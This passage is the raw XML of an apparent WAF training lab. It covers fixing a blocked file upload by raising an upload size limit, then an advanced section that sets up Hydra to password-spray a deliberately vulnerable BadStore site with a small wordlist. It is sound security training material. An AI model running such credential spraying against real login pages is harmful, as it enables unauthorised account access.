        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="673F0306">
        <w:rPr/>
        <w:t xml:space="preserve">/ </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="673F0306">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>money</w:t>
      </w:r>
      <w:r w:rsidR="673F0306">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF500C" w:rsidP="16AED19E" w:rsidRDefault="00FF500C" w14:paraId="740B9F03" w14:textId="593B6BB1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="2F310337">
        <w:rPr/>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="184C1F62">
        <w:rPr/>
        <w:t xml:space="preserve">supplier has made the price list for you to troubleshoot with available at: </w:t>
      </w:r>
      <w:hyperlink r:id="R9742763ba0974c60">
        <w:r w:rsidRPr="16AED19E" w:rsidR="184C1F62">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://s3.amazonaws.com/nmiron-sko20-labs/pricelist.dat</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="184C1F62">
        <w:rPr/>
        <w:t xml:space="preserve"> .  You can save this </w:t>
      </w:r>
      <w:r w:rsidR="28EB0930">
        <w:rPr/>
        <w:t xml:space="preserve">file </w:t>
      </w:r>
      <w:r w:rsidR="184C1F62">
        <w:rPr/>
        <w:t>to your computer</w:t>
      </w:r>
      <w:r w:rsidR="391B9172">
        <w:rPr/>
        <w:t xml:space="preserve"> now</w:t>
      </w:r>
      <w:r w:rsidR="391B9172">
        <w:rPr/>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
      <w:r w:rsidR="391B9172">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF500C" w:rsidP="16AED19E" w:rsidRDefault="00FF500C" w14:paraId="739B7DA8" w14:textId="6067DDF9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="6B874B17">
        <w:rPr/>
        <w:t>Click “Choose File” and select pricelist.dat that you just downloaded</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF500C" w:rsidP="16AED19E" w:rsidRDefault="00FF500C" w14:paraId="229F9B19" w14:textId="7CC46AAE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="6B874B17">
        <w:rPr/>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="00FF500C">
        <w:rPr/>
        <w:t>nter</w:t>
      </w:r>
      <w:r w:rsidR="226FE444">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FF500C">
        <w:rPr/>
        <w:t>a filename of “</w:t>
      </w:r>
      <w:r w:rsidR="181D0E57">
        <w:rPr/>
        <w:t>my-</w:t>
      </w:r>
      <w:r w:rsidR="1B613585">
        <w:rPr/>
        <w:t>pricelist</w:t>
      </w:r>
      <w:r w:rsidR="53FC886D">
        <w:rPr/>
        <w:t>.doc</w:t>
      </w:r>
      <w:r w:rsidR="00FF500C">
        <w:rPr/>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF500C" w:rsidP="16AED19E" w:rsidRDefault="00FF500C" w14:paraId="29A0B10F" w14:textId="4CDFECCF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="78258144">
        <w:rPr/>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00FF500C">
        <w:rPr/>
        <w:t xml:space="preserve">licks Upload. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0A482B8C" w:rsidP="16AED19E" w:rsidRDefault="0A482B8C" w14:paraId="598C74D5" w14:textId="1FD293F1">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidR="0A482B8C">
        <w:rPr/>
        <w:t>You will see a blocked page, or a blank page which you can refresh to see the blocked page.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="687CA52E" w:rsidP="699639B3" w:rsidRDefault="4B8AB2B2" w14:paraId="3FAD9296" w14:textId="3ECAEB00">
      <w:r w:rsidR="4B8AB2B2">
        <w:drawing>
          <wp:inline wp14:editId="5204ECF2" wp14:anchorId="392AB527">
            <wp:extent cx="2080171" cy="1801078"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1569228050" name="Picture 1569228050" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture 1569228050"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R021bd5a8443742a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0171" cy="1801078"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="4960FEF7">
        <w:drawing>
          <wp:inline wp14:editId="719D923B" wp14:anchorId="433D0333">
            <wp:extent cx="2867025" cy="1699999"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="623780379" name="Picture 623780379" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture 623780379"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R44234863537f46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7025" cy="1699999"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF500C" w:rsidP="00FF500C" w:rsidRDefault="00FF500C" w14:paraId="4BD4257A" w14:textId="0F37929F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Hint</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF500C" w:rsidP="00FF500C" w:rsidRDefault="00FF500C" w14:paraId="62008CD1" w14:textId="36B056FA">
      <w:r w:rsidR="00FF500C">
        <w:rPr/>
        <w:t>What does the Firewall Log entry say when you try it?</w:t>
      </w:r>
      <w:r w:rsidR="2608935E">
        <w:rPr/>
        <w:t xml:space="preserve">  How big is the file you downloaded?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF500C" w:rsidP="00FF500C" w:rsidRDefault="00FF500C" w14:paraId="66201DBF" w14:textId="1926A914">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Hint 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF500C" w:rsidP="00FF500C" w:rsidRDefault="00FF500C" w14:paraId="7B312D51" w14:textId="6F3C1046">
      <w:r>
        <w:t>Files are uploaded through URL parameters. Which component would you expect to use to control parameter limits?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF500C" w:rsidP="00FF500C" w:rsidRDefault="00FF500C" w14:paraId="6E493966" w14:textId="09F16140">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Instructions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF500C" w:rsidP="00FF500C" w:rsidRDefault="778FF361" w14:paraId="0C2C79CB" w14:textId="41B9D280">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="27073202">
        <w:rPr/>
        <w:t xml:space="preserve">Add </w:t>
      </w:r>
      <w:r w:rsidR="00FF500C">
        <w:rPr/>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="00FF500C">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Parameter Protection</w:t>
      </w:r>
      <w:r w:rsidR="00FF500C">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FF500C">
        <w:rPr/>
        <w:t>component</w:t>
      </w:r>
      <w:r w:rsidR="27371931">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF500C" w:rsidP="00FF500C" w:rsidRDefault="00FF500C" w14:paraId="003D9E00" w14:textId="05F29819">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="00FF500C">
        <w:rPr/>
        <w:t xml:space="preserve">Find the Max Upload File Size input and change it to </w:t>
      </w:r>
      <w:r w:rsidR="3B062ED4">
        <w:rPr/>
        <w:t>4000</w:t>
      </w:r>
      <w:r w:rsidR="2642F0F1">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="2642F0F1">
        <w:rPr/>
        <w:t>( the</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="2642F0F1">
        <w:rPr/>
        <w:t xml:space="preserve"> value in is KB, so this would allow up to 4MB Files.  The pricelist file is about 3MB in size, so this should be a good value. )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00FF500C" w:rsidR="00FF500C" w:rsidP="16AED19E" w:rsidRDefault="00FF500C" w14:paraId="302D6800" w14:textId="5BBD67F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="00FF500C">
        <w:rPr/>
        <w:t>Click Save</w:t>
      </w:r>
      <w:r w:rsidR="5AA36CAE">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="3E97F368">
        <w:rPr/>
        <w:t>and w</w:t>
      </w:r>
      <w:r w:rsidR="5AA36CAE">
        <w:rPr/>
        <w:t xml:space="preserve">ait </w:t>
      </w:r>
      <w:r w:rsidR="3F1929C1">
        <w:rPr/>
        <w:t xml:space="preserve">the customary </w:t>
      </w:r>
      <w:r w:rsidR="77303298">
        <w:rPr/>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidR="3631EC26">
        <w:rPr/>
        <w:t>ive</w:t>
      </w:r>
      <w:r w:rsidR="77303298">
        <w:rPr/>
        <w:t xml:space="preserve"> minutes </w:t>
      </w:r>
      <w:r w:rsidR="5AA36CAE">
        <w:rPr/>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r w:rsidR="5AA36CAE">
        <w:rPr/>
        <w:t xml:space="preserve">the change </w:t>
      </w:r>
      <w:r w:rsidR="2C847CE5">
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="5AA36CAE">
        <w:rPr/>
        <w:t xml:space="preserve"> propagate to all your </w:t>
      </w:r>
      <w:r w:rsidR="74DA0131">
        <w:rPr/>
        <w:t xml:space="preserve">WAF </w:t>
      </w:r>
      <w:r w:rsidR="5AA36CAE">
        <w:rPr/>
        <w:t>locations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="25A77BF8" w:rsidP="16AED19E" w:rsidRDefault="25A77BF8" w14:paraId="6AFD9D1F" w14:textId="4A2FF231">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="25A77BF8">
        <w:rPr/>
        <w:t>Test again</w:t>
      </w:r>
      <w:r w:rsidR="5C960940">
        <w:rPr/>
        <w:t xml:space="preserve"> – upload the file again, and see if that fixed it!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="4CBE4E3E" w:rsidRDefault="326B0EE2" w14:paraId="7D220FD8" w14:textId="684B8C9E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidR="6E1A2BF4">
        <w:rPr/>
        <w:t>Advanced – Requires Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="32F6121D" w:rsidRDefault="326B0EE2" w14:paraId="16B0A0BD" w14:textId="71B47EC5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="32F6121D" w:rsidR="4A4690D9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Using Hydra to spray credentials and do </w:t>
      </w:r>
      <w:r w:rsidRPr="32F6121D" w:rsidR="4A4690D9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>perform</w:t>
      </w:r>
      <w:r w:rsidRPr="32F6121D" w:rsidR="4A4690D9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Credential </w:t>
      </w:r>
      <w:r w:rsidRPr="32F6121D" w:rsidR="4A4690D9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Stuffing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="32F6121D" w:rsidRDefault="326B0EE2" w14:paraId="03B0BD49" w14:textId="68510610">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="32F6121D" w:rsidR="4A4690D9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We will be using Hydra to execute our attack. Hydra is an authentication brute-forcing tool that can be used for many protocols and services. It can help us automate our password spraying attack</w:t>
      </w:r>
      <w:r w:rsidRPr="32F6121D" w:rsidR="6451A132">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="32F6121D" w:rsidRDefault="326B0EE2" w14:paraId="51F98274" w14:textId="2489045A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="32F6121D" w:rsidR="4A4690D9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Installing Hydra</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="32F6121D" w:rsidRDefault="326B0EE2" w14:paraId="21A7D75E" w14:textId="22F355FD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="32F6121D" w:rsidR="4A4690D9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>First, let’s install Hydra. If you are using Kali Linux, a version of Hydra is already installed. Otherwise, you can run this command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="32F6121D" w:rsidRDefault="326B0EE2" w14:paraId="26DD2D99" w14:textId="782605DF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="32F6121D" w:rsidR="4A4690D9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="32F6121D" w:rsidR="4A4690D9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> apt-get install </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="32F6121D" w:rsidR="4A4690D9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hydra</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="1FEADC78" w:rsidRDefault="326B0EE2" w14:paraId="30FA3E5C" w14:textId="25EBF2EC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="1FEADC78" w:rsidR="4A4690D9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Preparing wordlists</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="32F6121D" w:rsidRDefault="326B0EE2" w14:paraId="147F78EC" w14:textId="718A9F86">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="32F6121D" w:rsidR="4A4690D9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Before you start spraying for passwords, you </w:t>
      </w:r>
      <w:r w:rsidRPr="32F6121D" w:rsidR="6F0EABE4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>will</w:t>
      </w:r>
      <w:r w:rsidRPr="32F6121D" w:rsidR="4A4690D9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> collect a list of usernames and a list of passwords to use.</w:t>
      </w:r>
      <w:r w:rsidRPr="32F6121D" w:rsidR="22CC0BD1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> For this demo – we will just use admin as the username. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="1FEADC78" w:rsidRDefault="326B0EE2" w14:paraId="15ED96AE" w14:textId="5C2FCC34">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="40" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="1FEADC78" w:rsidR="58C8E6FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Passwords</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="32F6121D" w:rsidRDefault="326B0EE2" w14:paraId="7B33A86D" w14:textId="36AC532F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>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 xml:space="preserve">Create a Txt file using a list of passwords – name it </w:t>
      </w:r>
      <w:r w:rsidRPr="32F6121D" w:rsidR="58C8E6FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hydra_passwords.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="32F6121D" w:rsidR="58C8E6FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="32F6121D" w:rsidRDefault="326B0EE2" w14:paraId="4E9ED90A" w14:textId="69F2E6FA">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="off" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="32F6121D" w:rsidR="58C8E6FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>badstore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="32F6121D" w:rsidRDefault="326B0EE2" w14:paraId="6FB11917" w14:textId="73CB76AD">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BADSTORE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="32F6121D" w:rsidRDefault="326B0EE2" w14:paraId="0F665C12" w14:textId="07AA6D59">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secret</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="32F6121D" w:rsidRDefault="326B0EE2" w14:paraId="3D78BE7D" w14:textId="68A30453">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="off" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="32F6121D" w:rsidR="58C8E6FA">
        <w:rPr>
